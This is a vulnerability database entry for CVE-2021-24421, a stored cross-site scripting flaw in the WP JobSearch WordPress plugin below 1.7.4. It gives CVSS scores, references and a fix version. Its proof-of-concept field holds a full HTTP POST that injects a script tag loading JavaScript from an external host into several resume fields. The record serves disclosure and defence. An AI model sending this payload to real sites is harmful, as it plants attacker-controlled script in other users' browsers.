WP JobSearch < 1.7.4 - Authenticated Stored XSS

2021-06-16T00:00:00

Description

The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue

{"id": "WPEX-ID:B378D36D-66D9-4373-A628-E379E4766375", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP JobSearch < 1.7.4 - Authenticated Stored XSS", "description": "The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue\n", "published": "2021-06-16T00:00:00", "modified": "2021-06-29T14:12:50", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "", "reporter": "m0ze", "references": ["https://m0ze.ru/vulnerability/[2021-05-19]-[WordPress]-[CWE-79]-WP-JobSearch-WordPress-Plugin-v1.7.3.txt", "https://m0ze.ru/vulnerability/[2021-05-19]-[WordPress]-[CWE-79]-Careerfy-WordPress-Theme-v6.2.0.txt"], "cvelist": ["CVE-2021-24421"], "immutableFields": [], "lastseen": "2021-09-14T23:11:33", "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24421"]}, {"type": "patchstack", "idList": ["PATCHSTACK:3A162410AFA346C25FF9ACAB0488D969"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24421"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-24421", "epss": "0.000580000", "percentile": "0.224540000", "modified": "2023-03-17"}], "vulnersScore": 0.2}, "sourceData": "Vulnerable parameter(s): &jobsearch_field_education_title[]=, &jobsearch_field_education_academy[]=, &jobsearch_field_experience_company[]=, &jobsearch_field_portfolio_title[]=, &jobsearch_field_portfolio_vurl[]=, &jobsearch_field_portfolio_url[]=, &jobsearch_field_skill_title[]=, &jobsearch_field_lang_title[]=.\r\n\r\nPoC | Authenticated Persistent XSS | Candidate Profile:\r\n\r\nPOST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2\r\nCookie: [user cookies]\r\nUser-Agent: Mozilla/5.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1612\r\n\r\njobsearch_field_resume_cover_letter=PoC&candidate_cover_file=&get_cand_skills%5B%5D=1553&jobsearch_field_education_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_start_date%5B%5D=May+29%2C+2021&jobsearch_field_education_end_date%5B%5D=&jobsearch_field_education_date_prsnt%5B%5D=on&jobsearch_field_education_academy%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_description%5B%5D=PoC&jobsearch_field_experience_title%5B%5D=1553&jobsearch_field_experience_start_date%5B%5D=May+29%2C+2021&jobsearch_field_experience_end_date%5B%5D=June+29%2C+2021&jobsearch_field_experience_date_prsnt%5B%5D=on&jobsearch_field_experience_company%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_experience_description%5B%5D=PoC&add_portfolio_img=&jobsearch_field_portfolio_title%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&add_portfolio_img=&jobsearch_field_portfolio_image%5B%5D=921218418&jobsearch_field_portfolio_vurl%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_portfolio_url%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_skill_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_skill_percentage%5B%5D=88&jobsearch_field_lang_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_lang_level%5B%5D=proficient&jobsearch_field_lang_percentage%5B%5D=88&jobsearch_field_award_title%5B%5D=1553&jobsearch_field_award_year%5B%5D=2021&jobsearch_field_award_description%5B%5D=PoC&user_resume_form=1&terms_cond_check=on\r\n\r\n", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007784, "epss": 1679073339}, "_internal": {"score_hash": "49b3bafa57dd4a32d6f0c1086a6b8658"}}

{"wpvulndb": [{"lastseen": "2021-09-14T23:11:33", "description": "The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue\n\n### PoC\n\nVulnerable parameter(s): &jobsearch;_field_education_title[]=, &jobsearch;_field_education_academy[]=, &jobsearch;_field_experience_company[]=, &jobsearch;_field_portfolio_title[]=, &jobsearch;_field_portfolio_vurl[]=, &jobsearch;_field_portfolio_url[]=, &jobsearch;_field_skill_title[]=, &jobsearch;_field_lang_title[]=. PoC | Authenticated Persistent XSS | Candidate Profile: POST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2 Cookie: [user cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1612 jobsearch_field_resume_cover_letter=PoC&candidate;_cover_file=&get;_cand_skills%5B%5D=1553&jobsearch;_field_education_title%5B%5D=", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-16T00:00:00", "type": "wpvulndb", "title": "WP JobSearch < 1.7.4 - Authenticated Stored XSS", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-06-29T14:12:50", "id": "WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375", "href": "https://wpscan.com/vulnerability/b378d36d-66d9-4373-a628-e379e4766375", "sourceData": "", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-02-09T14:11:21", "description": "The WP JobSearch WordPress plugin before 1.7.4 did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-12T20:15:00", "type": "cve", "title": "CVE-2021-24421", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-07-15T14:55:00", "cpe": [], "id": "CVE-2021-24421", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24421", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:32:15", "description": "Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by m0ze in WordPress JobSearch premium plugin (versions <= 1.7.3).\n\n## Solution\n\n\r\n Update the WordPress JobSearch premium plugin to the latest available version (at least 1.7.4).\r\n ", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-19T00:00:00", "type": "patchstack", "title": "WordPress JobSearch premium plugin <= 1.7.3 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-05-19T00:00:00", "id": "PATCHSTACK:3A162410AFA346C25FF9ACAB0488D969", "href": "https://patchstack.com/database/vulnerability/wp-jobsearch/wordpress-jobsearch-premium-plugin-1-7-3-authenticated-persistent-cross-site-scripting-xss-vulnerability", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T10:44:50", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on PHP and MySQL servers. WordPress plugin is a WordPress open source application plugin. a security vulnerability in versions prior to WP JobSearch WordPress plugin 1.7.4 stems from the plugin's failure to clean up or escape its multiple parameters from the \"\"my- resume\" page before exporting data to the page or escaping its multiple parameters, allowing a low-privileged user to use the JavaScript load in it and causing a cross-site scripting issue to be stored. No details of the vulnerability are currently available.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-14T00:00:00", "type": "cnvd", "title": "WordPress plugin has an unspecified vulnerability (CNVD-2021-59597)", "bulletinFamily": "cnvd", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-08-09T00:00:00", "id": "CNVD-2021-59597", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-59597", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}

WP JobSearch &lt; 1.7.4 - Authenticated Stored XSS

Description

Related

WP JobSearch < 1.7.4 - Authenticated Stored XSS